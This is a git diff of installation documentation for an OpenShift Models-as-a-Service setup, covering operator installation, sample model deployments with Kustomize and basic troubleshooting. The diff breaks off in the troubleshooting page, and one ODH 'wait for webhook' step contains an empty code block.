+    If components do not become ready, run `kubectl describe datasciencecluster default-dsc` to inspect conditions and events.
 
 ## Next steps
 
-* **Deploy models.** See the Quick Start for
-  [sample model deployments](../quickstart.md#model-setup) that you
-  can use to try the MaaS capability.
+* **Deploy models.** See [Model Setup (On Cluster)](model-setup.md) for sample model deployments.
 * **Perform validation.** Follow the [validation guide](validation.md) to verify that
   MaaS is working correctly.
diff --git a/docs/content/install/model-setup.md b/docs/content/install/model-setup.md
new file mode 100644
index 000000000..98ce13abe
--- /dev/null
+++ b/docs/content/install/model-setup.md
@@ -0,0 +1,145 @@
+# Deploy Sample Models
+
+## What We Deploy
+
+Our sample models are packaged as Kustomize overlays that deploy:
+
+| Resource | Purpose |
+|----------|---------|
+| **LLMInferenceService** | The LLM workload — the actual inference service (simulator, vLLM, etc.) |
+| **MaaSModelRef** | Gives the MaaS system a reference to the model so it appears in the model catalog |
+| **MaaSAuthPolicy** | Grants access to the model for specified groups (who can use it) |
+| **MaaSSubscription** | Defines rate limits (token quotas) for specific groups |
+
+For more detail on each resource, see [Access and Quota Overview](../configuration-and-management/subscription-overview.md).
+
+!!! tip "Create llm namespace (optional)"
+    Models deploy to the `llm` namespace. If it does not exist, create it first (idempotent—safe to run even if it already exists):
+
+    ```bash
+    kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f -
+    ```
+
+## Deploy Sample Models
+
+### Simulator Model (CPU)
+
+A lightweight mock service for testing that generates responses without running an actual language model. This sample deploys the full MaaS stack:
+
+- **LLMInferenceService** — Simulator workload
+- **MaaSModelRef** — Registers the model with MaaS
+- **MaaSAuthPolicy** — Access for `system:authenticated` (all authenticated users)
+- **MaaSSubscription** — Rate limit of 100 tokens/min for `system:authenticated`
+
+```bash
+PROJECT_DIR=$(git rev-parse --show-toplevel)
+kustomize build ${PROJECT_DIR}/docs/samples/maas-system/free/ | kubectl apply -f -
+```
+
+### Simulator Model — Premium (CPU)
+
+Same simulator workload with premium access and higher rate limits:
+
+- **LLMInferenceService** — Simulator workload
+- **MaaSModelRef** — Registers the model with MaaS
+- **MaaSAuthPolicy** — Access for `premium-user` group only
+- **MaaSSubscription** — Rate limit of 1000 tokens/min for `premium-user`
+
+```bash
+PROJECT_DIR=$(git rev-parse --show-toplevel)
+kustomize build ${PROJECT_DIR}/docs/samples/maas-system/premium/ | kubectl apply -f -
+```
+
+### Facebook OPT-125M Model (CPU)
+
+An inference deployment that loads and runs a 125M parameter model without the need for a GPU. This sample deploys the full MaaS stack:
+
+- **LLMInferenceService** — vLLM CPU workload
+- **MaaSModelRef** — Registers the model with MaaS
+- **MaaSAuthPolicy** — Access for `system:authenticated` (all authenticated users)
+- **MaaSSubscription** — Rate limit of 100 tokens/min for `system:authenticated`
+
+```bash
+PROJECT_DIR=$(git rev-parse --show-toplevel)
+kustomize build ${PROJECT_DIR}/docs/samples/maas-system/facebook-opt-125m-cpu/ | kubectl apply -f -
+```
+
+### Qwen3 Model (GPU Required)
+
+⚠️ This model requires GPU nodes with `nvidia.com/gpu` resources available in your cluster. This sample deploys the full MaaS stack:
+
+- **LLMInferenceService** — vLLM GPU workload
+- **MaaSModelRef** — Registers the model with MaaS
+- **MaaSAuthPolicy** — Access for `system:authenticated` (all authenticated users)
+- **MaaSSubscription** — Rate limit of 100 tokens/min for `system:authenticated`
+
+```bash
+PROJECT_DIR=$(git rev-parse --show-toplevel)
+kustomize build ${PROJECT_DIR}/docs/samples/maas-system/qwen3/ | kubectl apply -f -
+```
+
+### Verify Model Deployment
+
+```bash
+# Check LLMInferenceService status
+kubectl get llminferenceservices -n llm
+
+# Check pods
+kubectl get pods -n llm
+```
+
+**Validate MaaSModelRef status** — The MaaS controller populates `status.endpoint` and `status.phase` on each MaaSModelRef from the LLMInferenceService. The MaaSModelRef `status.endpoint` should match the URL exposed by the LLMInferenceService (via the gateway). Verify:
+
+```bash
+# Check MaaSModelRef status (same namespace as the LLMInferenceService, e.g. llm)
+kubectl get maasmodelref -n llm -o wide
+
+# Verify status.endpoint is populated and phase is Ready
+kubectl get maasmodelref -n llm -o jsonpath='{range .items[*]}{.metadata.name}: phase={.status.phase} endpoint={.status.endpoint}{"\n"}{end}'
+
+# Compare with LLMInferenceService — status.endpoint should match the URL from LLMIS status.addresses or status.url
+kubectl get llminferenceservice -n llm -o yaml | grep "url:"
+```
+
+The `status.endpoint` on MaaSModelRef is derived from the LLMInferenceService (gateway-external URL, or `status.addresses`, or `status.url`). Both should show the same URL. You can also confirm via the [Validation](validation.md) guide—the `/v1/models` API returns the same URL from MaaSModelRef `status.endpoint`. If phase is not `Ready` or endpoint is empty, the MaaS controller may still be reconciling—wait a minute and recheck.
+
+### Update Existing Models (Optional)
+
+To expose an existing model through MaaS, you must:
+
+1. Ensure the `LLMInferenceService` uses the `maas-default-gateway` gateway
+2. Create a **MaaSModelRef** that references the LLMInferenceService
+3. Create **MaaSAuthPolicy** and **MaaSSubscription** to define access and rate limits
+
+See [Quota and Access Configuration](../configuration-and-management/quota-and-access-configuration.md) for step-by-step instructions.
+
+**Gateway reference** — If the model does not yet use the MaaS gateway:
+
+```bash
+kubectl patch llminferenceservice my-production-model -n llm --type='json' -p='[
+  {
+    "op": "add",
+    "path": "/spec/gateway/refs/-",
+    "value": {
+      "name": "maas-default-gateway",
+      "namespace": "openshift-ingress"
+    }
+  }
+]'
+```
+
+```yaml
+apiVersion: serving.kserve.io/v1alpha1
+kind: LLMInferenceService
+metadata:
+  name: my-production-model
+spec:
+  gateway:
+    refs:
+      - name: maas-default-gateway
+        namespace: openshift-ingress
+```
+
+## Next Steps
+
+Proceed to [Validation](validation.md) to test and verify your deployment.
diff --git a/docs/content/install/platform-setup.md b/docs/content/install/platform-setup.md
index 5d5c292f5..4547d9447 100644
--- a/docs/content/install/platform-setup.md
+++ b/docs/content/install/platform-setup.md
@@ -1,28 +1,23 @@
-# Install Open Data Hub or Red Hat OpenShift AI
+# Install Open Data Hub
 
-This guide covers the installation of either Open Data Hub (ODH) or Red Hat OpenShift AI (RHOAI),
-with the required configuration to enable the Models-as-a-Service capability (MaaS).
+This guide covers the installation of Open Data Hub (ODH) with the required configuration
+to enable the Models-as-a-Service capability (MaaS).
 
-!!! note "Choose Your Platform"
-    You should choose either **Open Data Hub** or **Red Hat OpenShift AI** - do not install both.
-    The installation steps are similar with a few platform-specific differences noted throughout.
+!!! note "Red Hat OpenShift AI"
+    Red Hat OpenShift AI (RHOAI) is also compatible. The installation steps are similar;
+    platform-specific differences are noted in the tabs throughout this guide.
 
 ## Prerequisites
 
 You need a Red Hat OpenShift cluster version 4.19.9 or later. Older OpenShift versions are not suitable.
 
-MaaS requires the Model Serving component configured for deploying models with `LLMInferenceService`
-resources. The prerequisites for this setup are a Gateway API controller (Kuadrant or RHCL) and the
-LeaderWorkerSet API (LWS).
+**Required tools:** See [Prerequisites Overview](prerequisites.md#required-tools).
 
-**Tools you will need:**
+This section walks through the installation of the required Operators:
 
-* `kubectl` or `oc` client (this guide uses `kubectl`)
-
-**For ODH installations only:**
-
-* `curl`
-* `jq`
+* LeaderWorkerSet
+* Kuadrant (or RHCL)
+* Platform operator (ODH or RHOAI)
 
 !!! note "Documentation References"
     This guide is provided for convenience. In case of any issues or more advanced setups:
@@ -32,11 +27,24 @@ LeaderWorkerSet API (LWS).
 
 ## Install LeaderWorkerSet API
 
+=== "Open Data Hub"
+
+    Install the latest version of LWS by using the _kubectl_ method from
+    [LWS official documentation](https://lws.sigs.k8s.io/docs/installation/#install-by-kubectl):
+
+    ```shell
+    GH_LATEST_LWS_ENTRY_URL="https://api.github.com/repos/kubernetes-sigs/lws/releases"
+    LATEST_LWS_VERSION=$(curl -sSf ${GH_LATEST_LWS_ENTRY_URL} | jq -r 'sort_by(.tag_name|ltrimstr("v")|split(".")|map(tonumber)) | last | .tag_name')
+
+    kubectl apply --server-side -f https://github.com/kubernetes-sigs/lws/releases/download/${LATEST_LWS_VERSION}/manifests.yaml
+    ```
+
 === "Red Hat OpenShift AI"
 
     Install Red Hat LeaderWorkerSet API (LWS) Operator from OpenShift's built-in OperatorHub:
 
     ```yaml
+    kubectl apply -f - <<EOF
     apiVersion: v1
     kind: Namespace
     metadata:
@@ -62,11 +70,19 @@ LeaderWorkerSet API (LWS).
       name: leader-worker-set
       source: redhat-operators
       sourceNamespace: openshift-marketplace
+    EOF
+    ```
+
+    Wait for the subscription to install successfully:
+
+    ```shell
+    kubectl wait --for=jsonpath='{.status.state}'=AtLatestKnown subscription/leader-worker-set -n openshift-lws-operator --timeout=300s
     ```
 
     Once the LWS operator is ready, set up the LWS API:
 
     ```yaml
+    kubectl apply -f - <<EOF
     apiVersion: operator.openshift.io/v1
     kind: LeaderWorkerSetOperator
     metadata:
@@ -74,44 +90,37 @@ LeaderWorkerSet API (LWS).
       namespace: openshift-lws-operator
     spec:
       managementState: Managed
+    EOF
     ```
 
     Check [Red Hat LWS documentation](https://docs.redhat.com/en/documentation/openshift_container_platform/latest/html/ai_workloads/leader-worker-set-operator)
     if you need further guidance.
 
-=== "Open Data Hub"
-
-    Install the latest version of LWS by using the _kubectl_ method from
-    [LWS official documentation](https://lws.sigs.k8s.io/docs/installation/#install-by-kubectl):
-
-    ```shell
-    GH_LATEST_LWS_ENTRY_URL="https://api.github.com/repos/kubernetes-sigs/lws/releases"
-    LATEST_LWS_VERSION=$(curl -sSf ${GH_LATEST_LWS_ENTRY_URL} | jq -r 'sort_by(.tag_name|ltrimstr("v")|split(".")|map(tonumber)) | last | .tag_name')
-
-    kubectl apply --server-side -f https://github.com/kubernetes-sigs/lws/releases/download/${LATEST_LWS_VERSION}/manifests.yaml
-    ```
-
 ### Verification
 
 Check that LWS deployments are ready:
 
-=== "Red Hat OpenShift AI"
+=== "Open Data Hub"
 
     ```shell
-    kubectl get deployments --namespace openshift-lws-operator
+    kubectl get deployments --namespace lws-system -w
+    ```
 
+    ```
     NAME                     READY   UP-TO-DATE   AVAILABLE   AGE
-    lws-controller-manager   2/2     2            2           61s
-    openshift-lws-operator   1/1     1            1           4m26s
+    lws-controller-manager   2/2     2            2           35s
     ```
 
-=== "Open Data Hub"
+=== "Red Hat OpenShift AI"
 
     ```shell
-    kubectl get deployments --namespace lws-system
+    kubectl get deployments --namespace openshift-lws-operator -w
+    ```
 
+    ```
     NAME                     READY   UP-TO-DATE   AVAILABLE   AGE
-    lws-controller-manager   2/2     2            2           35s
+    lws-controller-manager   2/2     2            2           61s
+    openshift-lws-operator   1/1     1            1           4m26s
     ```
 
 ## Install Gateway API Controller
@@ -119,78 +128,38 @@ Check that LWS deployments are ready:
 Initialize OpenShift's provided Gateway API implementation:
 
 ```yaml
+kubectl apply -f - <<EOF
 apiVersion: gateway.networking.k8s.io/v1
 kind: GatewayClass
 metadata:
   name: openshift-default
 spec:
   controllerName: "openshift.io/gateway-controller/v1"
+EOF
 ```
 
 Wait until the GatewayClass resource is accepted:
 
 ```shell
-kubectl get gatewayclass openshift-default
+kubectl get gatewayclass openshift-default -w
+```
 
+```
 NAME                CONTROLLER                           ACCEPTED   AGE
 openshift-default   openshift.io/gateway-controller/v1   True       52s
 ```
 
 Now install the Gateway API controller for your platform:
 
-=== "Red Hat OpenShift AI"
-
-    Install Red Hat Connectivity Link (RHCL) Operator from OpenShift's built-in OperatorHub.
-    MaaS requires RHCL v1.2 or later:
-
-    ```yaml
-    apiVersion: v1
-    kind: Namespace
-    metadata:
-      name: kuadrant-system
-    ---
-    apiVersion: operators.coreos.com/v1
-    kind: OperatorGroup
-    metadata:
-      name: kuadrant-operator-group
-      namespace: kuadrant-system
-    ---
-    apiVersion: operators.coreos.com/v1alpha1
-    kind: Subscription
-    metadata:
-      name: kuadrant-operator
-      namespace: kuadrant-system
-    spec:
-      channel: stable
-      installPlanApproval: Automatic
-      name: rhcl-operator
-      source: redhat-operators
-      sourceNamespace: openshift-marketplace
-    ```
-
-    Once the RHCL operator is ready, create a Connectivity Link instance:
-
-    ```yaml
-    apiVersion: kuadrant.io/v1beta1
-    kind: Kuadrant
-    metadata:
-      name: kuadrant
-      namespace: kuadrant-system
-    ```
-
 === "Open Data Hub"
 
     Install Kuadrant using the OLM method. MaaS requires Kuadrant v1.3.1 or later.
 
-    Create the `kuadrant-system` namespace:
+    Create the `kuadrant-system` namespace and OperatorGroup:
 
-    ```shell
+    ```yaml
     kubectl create namespace kuadrant-system
-    ```
 
-    Create an OperatorGroup:
-
-    ```shell
     kubectl apply -f - <<EOF
     apiVersion: operators.coreos.com/v1
     kind: OperatorGroup
@@ -208,12 +177,10 @@ Now install the Gateway API controller for your platform:
 
     Configure Kuadrant's CatalogSource:
 
-    ```shell
-    # Find latest Kuadrant operator version:
+    ```yaml
     GH_LATEST_KUADRANT_ENTRY_URL="https://api.github.com/repos/Kuadrant/kuadrant-operator/releases/latest"
     LATEST_KUADRANT_VERSION=$(curl -sSf ${GH_LATEST_KUADRANT_ENTRY_URL} | jq -r '.tag_name')
 
-    # Install the CatalogSource
     kubectl apply -f - <<EOF
     apiVersion: operators.coreos.com/v1alpha1
     kind: CatalogSource
@@ -229,7 +196,7 @@ Now install the Gateway API controller for your platform:
 
     Deploy the Kuadrant operator, configuring it to work with OpenShift's Gateway API:
 
-    ```shell
+    ```yaml
     kubectl apply -f - <<EOF
     apiVersion: operators.coreos.com/v1alpha1
     kind: Subscription
@@ -249,9 +216,21 @@ Now install the Gateway API controller for your platform:
     EOF
     ```
 
-    Once the Kuadrant operator is ready, create a Kuadrant instance:
+    Wait for the subscription to install successfully:
 
     ```shell
+    kubectl wait --for=jsonpath='{.status.state}'=AtLatestKnown subscription/kuadrant-operator -n kuadrant-system --timeout=300s
+    ```
+
+    Wait for the operator webhook to be ready:
+
+    ```shell
+    kubectl wait --for=condition=Available --timeout=120s deployment/kuadrant-operator-controller-manager -n kuadrant-system
+    ```
+
+    Once the Kuadrant operator is ready, create a Kuadrant instance:
+
+    ```yaml
     kubectl apply -f - <<EOF
     apiVersion: kuadrant.io/v1beta1
     kind: Kuadrant
@@ -261,116 +240,111 @@ Now install the Gateway API controller for your platform:
     EOF
     ```
 
-### Verification
-
-Check that Gateway API controller deployments are ready:
-
-```shell
-kubectl get deployments -n kuadrant-system
-
-NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
-authorino-operator                      1/1     1            1           80s
-dns-operator-controller-manager         1/1     1            1           77s
-kuadrant-console-plugin                 1/1     1            1           58s
-kuadrant-operator-controller-manager    1/1     1            1           69s
-limitador-operator-controller-manager   1/1     1            1           73s
-```
-
-For RHOAI installations, you should also see:
-
-```shell
-authorino                               1/1     1            1           81s
-limitador-limitador                     1/1     1            1           82s
-```
-
-## Install Platform with Model Serving
-
-First, set up the inference Gateway required by Model Serving:
-
-```yaml
-apiVersion: gateway.networking.k8s.io/v1
-kind: Gateway
-metadata:
-  name: openshift-ai-inference
-  namespace: openshift-ingress
-spec:
-  gatewayClassName: openshift-default
-  listeners:
-  - name: http
-    port: 80
-    protocol: HTTP
-    allowedRoutes:
-      namespaces:
-        from: All
-  infrastructure:
-    labels:
-      serving.kserve.io/gateway: kserve-ingress-gateway
-```
-
-!!! info "Gateway Architecture"
-    MaaS uses a segregated gateway approach where models explicitly opt-in to MaaS capabilities. The `openshift-ai-inference` gateway above is for standard KServe inference, while `maas-default-gateway` (created later) enables token authentication and rate limiting. For details, see [Model Setup - Gateway Architecture](../configuration-and-management/model-setup.md#gateway-architecture).
-
-Now install the platform operator for your environment:
-
 === "Red Hat OpenShift AI"
 
-    Install Red Hat OpenShift AI (RHOAI) Operator from OpenShift's built-in OperatorHub.
-    MaaS requires RHOAI v3.0 or later:
+    Install Red Hat Connectivity Link (RHCL) Operator from OpenShift's built-in OperatorHub.
+    MaaS requires RHCL v1.2 or later:
 
     ```yaml
+    kubectl apply -f - <<EOF
     apiVersion: v1
     kind: Namespace
     metadata:
-      name: redhat-ods-operator
+      name: kuadrant-system
     ---
     apiVersion: operators.coreos.com/v1
     kind: OperatorGroup
     metadata:
-      name: rhoai3-operatorgroup
-      namespace: redhat-ods-operator
+      name: kuadrant-operator-group
+      namespace: kuadrant-system
     ---
     apiVersion: operators.coreos.com/v1alpha1
     kind: Subscription
     metadata:
-      name: rhoai3-operator
-      namespace: redhat-ods-operator
+      name: kuadrant-operator
+      namespace: kuadrant-system
     spec:
-      channel: fast-3.x
+      channel: stable
       installPlanApproval: Automatic
-      name: rhods-operator
+      name: rhcl-operator
       source: redhat-operators
       sourceNamespace: openshift-marketplace
+    EOF
+    ```
+
+    Wait for the subscription to install successfully:
+
+    ```shell
+    kubectl wait --for=jsonpath='{.status.state}'=AtLatestKnown subscription/kuadrant-operator -n kuadrant-system --timeout=300s
+    ```
+
+    Wait for the operator webhook to be ready:
+
+    ```shell
+    kubectl wait --for=condition=Available --timeout=120s deployment/kuadrant-operator-controller-manager -n kuadrant-system
     ```
 
-    Once ready, the RHOAI Operator should automatically create a `DSCInitialization` resource.
-    Install the Model Serving component by creating the following `DataScienceCluster` resource:
+    Watch for the remaining RHCL components to be ready:
+
+    ```shell
+    kubectl get deployments -n kuadrant-system -w
+    ```
+
+    ```
+    NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
+    authorino-operator                      1/1     1            1           23m
+    dns-operator-controller-manager         1/1     1            1           23m
+    kuadrant-console-plugin                 1/1     1            1           23m
+    kuadrant-operator-controller-manager    1/1     1            1           23m
+    limitador-operator-controller-manager   1/1     1            1           23m
+    ```
+
+    Once the RHCL operator is ready, create a Kuadrant instance:
 
     ```yaml
-    apiVersion: datasciencecluster.opendatahub.io/v2
-    kind: DataScienceCluster
+    kubectl apply -f - <<EOF
+    apiVersion: kuadrant.io/v1beta1
+    kind: Kuadrant
     metadata:
-      name: default-dsc
-    spec:
-      components:
-        # Components required for MaaS:
-        kserve:
-          managementState: Managed
-          rawDeploymentServiceConfig: Headed
-          # Enable Models-as-a-Service via operator
-          modelsAsService:
-            managementState: Managed
-
-        # Components recommended for MaaS:
-        dashboard:
-          managementState: Managed
+      name: kuadrant
+      namespace: kuadrant-system
+    EOF
     ```
 
+### Verification
+
+Check that Gateway API controller deployments are ready:
+
+```shell
+kubectl get deployments -n kuadrant-system -w
+```
+
+```
+NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
+authorino-operator                      1/1     1            1           80s
+dns-operator-controller-manager         1/1     1            1           77s
+kuadrant-console-plugin                 1/1     1            1           58s
+kuadrant-operator-controller-manager    1/1     1            1           69s
+limitador-operator-controller-manager   1/1     1            1           73s
+```
+
+For RHOAI installations, you should also see:
+
+```
+authorino                               1/1     1            1           81s
+limitador-limitador                     1/1     1            1           82s
+```
+
+## Install Platform Operator
+
+Install the platform operator (ODH or RHOAI) and initialize the platform with DSCInitialization. The DataScienceCluster and Gateway setup are in [Install MaaS Components](maas-setup.md).
+
 === "Open Data Hub"
 
     Install the Open Data Hub Project (ODH) operator, which is available in OpenShift's
     preconfigured CatalogSource of community operators. MaaS requires ODH v3.0 or later:
 
-    ```shell
+    ```yaml
     kubectl apply -f - <<EOF
     apiVersion: operators.coreos.com/v1alpha1
     kind: Subscription
@@ -379,18 +353,22 @@ Now install the platform operator for your environment:
       namespace: openshift-operators
     spec:
       channel: fast-3
+      installPlanApproval: Automatic
       name: opendatahub-operator
       source: community-operators
       sourceNamespace: openshift-marketplace
     EOF
     ```
 
-    Install the ODH Model Serving component by creating two resources:
-
-    1. A `DSCInitialization` resource to initialize the ODH platform
-    2. A `DataScienceCluster` resource to install ODH components
+    Wait for the subscription to install successfully:
 
     ```shell
+    kubectl wait --for=jsonpath='{.status.state}'=AtLatestKnown subscription/opendatahub-operator -n openshift-operators --timeout=300s
+    ```
+
+    Initialize the ODH platform with DSCInitialization:
+
+    ```yaml
     kubectl apply -f - <<EOF
     apiVersion: dscinitialization.opendatahub.io/v2
     kind: DSCInitialization
@@ -404,150 +382,63 @@ Now install the platform operator for your environment:
         metrics: {}
       trustedCABundle:
         managementState: Managed
-    ---
-    apiVersion: datasciencecluster.opendatahub.io/v2
-    kind: DataScienceCluster
-    metadata:
-      name: default-dsc
-    spec:
-      components:
-        # Components required for MaaS:
-        kserve:
-          managementState: Managed
-          rawDeploymentServiceConfig: Headed
-          # Enable Models-as-a-Service via operator
-          modelsAsService:
-            managementState: Managed
-
-        # Components recommended for MaaS:
-        dashboard:
-          managementState: Managed
     EOF
     ```
 
-!!! note "MaaS via Operator"
-    When `modelsAsService.managementState` is set to `Managed`, the operator will deploy
-    the MaaS API, MaaS API AuthPolicy, and NetworkPolicy automatically. However, the **Gateway**,
-    **Gateway AuthPolicy**, **TokenRateLimitPolicy**, and **RateLimitPolicy** must still be
-    installed manually following the instructions below and in [maas-setup.md](maas-setup.md).
-
-## Create MaaS Gateway
-
-A Gateway with the name `maas-default-gateway` is **required** for MaaS to function. The configuration
-below provides an example Gateway you can use:
-
-!!! warning "Example Gateway Configuration"
-    The Gateway configuration below is provided as an example. Depending on your cluster setup,
-    you may need additional configuration such as TLS certificates, specific listener settings,
-    or custom infrastructure labels. Consult your cluster administrator if you're unsure about
-    Gateway requirements for your environment.
-
-```shell
-# Get your cluster's domain
-CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')
-
-kubectl apply -f - <<EOF
-apiVersion: gateway.networking.k8s.io/v1
-kind: Gateway
-metadata:
-  name: maas-default-gateway
-  namespace: openshift-ingress
-spec:
-  gatewayClassName: openshift-default
-  listeners:
-   - name: http
-     hostname: maas.${CLUSTER_DOMAIN}
-     port: 80
-     protocol: HTTP
-     allowedRoutes:
-       namespaces:
-         from: All
-EOF
-```
-
-Wait for the Gateway to be programmed:
-
-```shell
-kubectl wait --for=condition=Programmed gateway/maas-default-gateway -n openshift-ingress --timeout=60s
-```
-
-!!! note
-    The `maas-default-gateway` created above satisfies the Gateway requirement for MaaS. When
-    following the next steps, you can skip the Gateway creation and proceed directly to installing
-    the Gateway AuthPolicy and usage policies in [maas-setup.md](maas-setup.md).
-
-## Verification
-
-Check that all MaaS components are running:
-
-=== "Red Hat OpenShift AI"
+    Wait for the operator webhook to be ready:
 
     ```shell
-    # Check RHOAI Model Serving deployments
-    kubectl get deployments -n redhat-ods-applications
-
-    NAME                        READY   UP-TO-DATE   AVAILABLE   AGE
-    kserve-controller-manager   1/1     1            1           73s
-    odh-model-controller        1/1     1            1           79s
-    rhods-dashboard             2/2     2            2           78s
-    maas-api                    1/1     1            1           60s  # Only if MaaS enabled
+    
+    
     ```
 
-=== "Open Data Hub"
-
-    ```shell
-    # Check MaaS API deployment
-    kubectl get deployment maas-api -n opendatahub
-
-    # Check HTTPRoute
-    kubectl get httproute maas-api-route -n opendatahub
+=== "Red Hat OpenShift AI"
 
-    # Check AuthPolicy
-    kubectl get authpolicy maas-api-auth-policy -n opendatahub
+    Install Red Hat OpenShift AI (RHOAI) Operator from OpenShift's built-in OperatorHub.
+    MaaS requires RHOAI v3.0 or later:
 
-    # Check NetworkPolicy (allows Authorino to reach MaaS API)
-    kubectl get networkpolicy maas-authorino-allow -n opendatahub
+    ```yaml
+    kubectl apply -f - <<EOF
+    apiVersion: v1
+    kind: Namespace
+    metadata:
+      name: redhat-ods-operator
+    ---
+    apiVersion: operators.coreos.com/v1
+    kind: OperatorGroup
+    metadata:
+      name: rhoai3-operatorgroup
+      namespace: redhat-ods-operator
+    ---
+    apiVersion: operators.coreos.com/v1alpha1
+    kind: Subscription
+    metadata:
+      name: rhoai3-operator
+      namespace: redhat-ods-operator
+    spec:
+      channel: fast-3.x
+      installPlanApproval: Automatic
+      name: rhods-operator
+      source: redhat-operators
+      sourceNamespace: openshift-marketplace
+    EOF
     ```
 
-    All resources should exist and the MaaS API deployment should show `READY 1/1`.
-
-## Test MaaS API Connectivity
-
-Verify that Authorino can communicate with the MaaS API:
-
-=== "Red Hat OpenShift AI"
+    Wait for the subscription to install successfully:
 
     ```shell
-    # Get Authorino pod
-    AUTHORINO_POD=$(kubectl get pods -n kuadrant-system -l authorino-resource=authorino -o jsonpath='{.items[0].metadata.name}')
-
-    # Test connectivity
-    kubectl exec -n kuadrant-system $AUTHORINO_POD -- curl -s \
-      http://maas-api.redhat-ods-applications.svc.cluster.local:8080/health
+    kubectl wait --for=jsonpath='{.status.state}'=AtLatestKnown subscription/rhoai3-operator -n redhat-ods-operator --timeout=300s
     ```
 
-=== "Open Data Hub"
+    Wait for the operator webhook to be ready:
 
     ```shell
-    # Get Authorino pod
-    AUTHORINO_POD=$(kubectl get pods -n kuadrant-system -l authorino-resource=authorino -o jsonpath='{.items[0].metadata.name}')
-
-    # Test connectivity
-    kubectl exec -n kuadrant-system $AUTHORINO_POD -- curl -s \
-      http://maas-api.opendatahub.svc.cluster.local:8080/health
+    kubectl wait --for=condition=Available --timeout=120s deployment/rhods-operator-controller-manager -n redhat-ods-operator
     ```
 
-Expected output:
-
-```json
-{"status":"healthy"}
-```
-
-For end-to-end validation and troubleshooting, see the [Validation Guide](validation.md).
+    Once ready, the RHOAI Operator automatically creates a `DSCInitialization` resource.
 
 ## Next Steps
 
-Once your platform with MaaS is installed:
-
-1. [Install MaaS Components](maas-setup.md) - Install Gateway AuthPolicy and usage policies
-2. [Deploy a Model](../configuration-and-management/model-setup.md) - Deploy your first LLMInferenceService
+1. [Install MaaS Components](maas-setup.md) - Database, Gateways, and Configure DataScienceCluster
+2. [Deploy a Model](../configuration-and-management/model-setup.md) - Deploy your first model
diff --git a/docs/content/install/prerequisites.md b/docs/content/install/prerequisites.md
index 005a78fe7..1f57fef33 100644
--- a/docs/content/install/prerequisites.md
+++ b/docs/content/install/prerequisites.md
@@ -1,58 +1,32 @@
 # MaaS Installation Overview
 
-ODH's _Models-as-a-Service_ is compatible with the Open Data Hub project (ODH) and
+_Models-as-a-Service_ is compatible with the Open Data Hub project (ODH) and
 Red Hat OpenShift AI (RHOAI). MaaS is installed by enabling it in the DataScienceCluster resource:
 
-* [Install your platform](platform-setup.md) (ODH or RHOAI) with MaaS enabled in the DataScienceCluster
-  (the operator will automatically deploy the MaaS API, MaaS API AuthPolicy, and NetworkPolicy).
-* [Install Gateway and policies manually](maas-setup.md) (Gateway, Gateway AuthPolicy, TokenRateLimitPolicy, and RateLimitPolicy).
+* [Install your platform](platform-setup.md) (ODH or RHOAI operators and DSCInitialization).
+* [Install MaaS Components](maas-setup.md) (Database, Gateways, DataScienceCluster).
 
-MaaS inherits the platform requirement for a Red Hat OpenShift cluster version 4.19.9 or
-later, which is the version that has formal support for Gateway API. For earlier OpenShift
-versions, there are alternatives (e.g. see a [guide here](https://github.com/opendatahub-io/kserve/tree/release-v0.15/docs/samples/llmisvc/ocp-4-18-setup)),
-but we provide no support for such setups.
+## Version Compatibility
 
-## Database Prerequisite
+| MaaS Version | OCP | Kuadrant (ODH) / RHCL (RHOAI) | Gateway API |
+|--------------|-----|-------------------------------|-------------|
+| v0.0.2       | 4.19.9+ | v1.3+ / v1.2+             | v1.2+       |
+| v0.1.0       | 4.19.9+ | v1.3+ / v1.2+             | v1.2+       |
 
-**IMPORTANT:** MaaS requires a PostgreSQL database for API key management. You **must** create a Secret with the database connection URL **before** enabling modelsAsService in your DataScienceCluster.
+!!! note "Other Kubernetes flavors"
+    Other Kubernetes flavors (e.g., upstream Kubernetes, other distributions) are currently being validated.
 
-### Database Options
 
-Choose one of the following PostgreSQL solutions for **production**:
 
-- **AWS RDS for PostgreSQL** (recommended for AWS deployments)
-- **Azure Database for PostgreSQL** (recommended for Azure deployments)
-- **Crunchy PostgreSQL Operator** (recommended for on-premises OpenShift)
-- **Self-managed PostgreSQL cluster** with backups and high availability
+## Required Tools
 
-!!! note "Development"
-    For **development**, the `scripts/deploy.sh` script creates a PostgreSQL instance and Secret automatically.
-
-### Required Secret
-
-Create the `maas-db-config` Secret in your ODH/RHOAI namespace (typically `opendatahub`):
-
-```bash
-kubectl create secret generic maas-db-config \
-  -n opendatahub \
-  --from-literal=DB_CONNECTION_URL='postgresql://username:password@hostname:5432/database?sslmode=require'
-```
-
-**Connection String Format:**
-```
-postgresql://USERNAME:PASSWORD@HOSTNAME:PORT/DATABASE?sslmode=require
-```
-
-**Example for AWS RDS:**
-```bash
-kubectl create secret generic maas-db-config \
-  -n opendatahub \
-  --from-literal=DB_CONNECTION_URL='postgresql://maasuser:mypassword@mydb.abc123.us-east-1.rds.amazonaws.com:5432/maas?sslmode=require'
-```
-
-!!! warning "Deployment Order"
-    The maas-api will fail to start if the Secret is missing. Create the Secret **before** enabling modelsAsService in your DataScienceCluster.
+The following tools are used across the installation guides:
 
+* `kubectl` or `oc` — cluster access
+* `curl` — used by Operator Setup (ODH/LWS)
+* `jq` — used for validation and version parsing
+* `kustomize` — used for Gateway AuthPolicy (MaaS Components)
+* `envsubst` — used for policy templates (MaaS Components)
 
 ## Requirements for Open Data Hub project
 
diff --git a/docs/content/install/troubleshooting.md b/docs/content/install/troubleshooting.md
new file mode 100644
index 000000000..f343f4e96
--- /dev/null
+++ b/docs/content/install/troubleshooting.md
@@ -0,0 +1,57 @@
+# Troubleshooting
+
+This guide helps you diagnose and resolve common issues with MaaS Platform deployments.
+
+## Common Issues
+
+1. **Getting `501` Not Implemented errors**: Traffic is not making it to the Gateway.
+      - [ ] Verify Gateway status and HTTPRoute configuration
+2. **Getting `401` Unauthorized errors when trying to create an API key**: Authentication to maas-api is not working.
+      - [ ] Verify `maas-api-auth-policy` AuthPolicy is applied
+      - [ ] Check if your cluster uses a custom token review audience:
+
+      ```bash
+      # Detect your cluster's audience
+      AUD="$(kubectl create token default --duration=10m 2>/dev/null | \
+        cut -d. -f2 | jq -Rr '@base64d | fromjson | .aud[0]' 2>/dev/null)"
+      echo "Cluster audience: ${AUD}"
+      ```
+
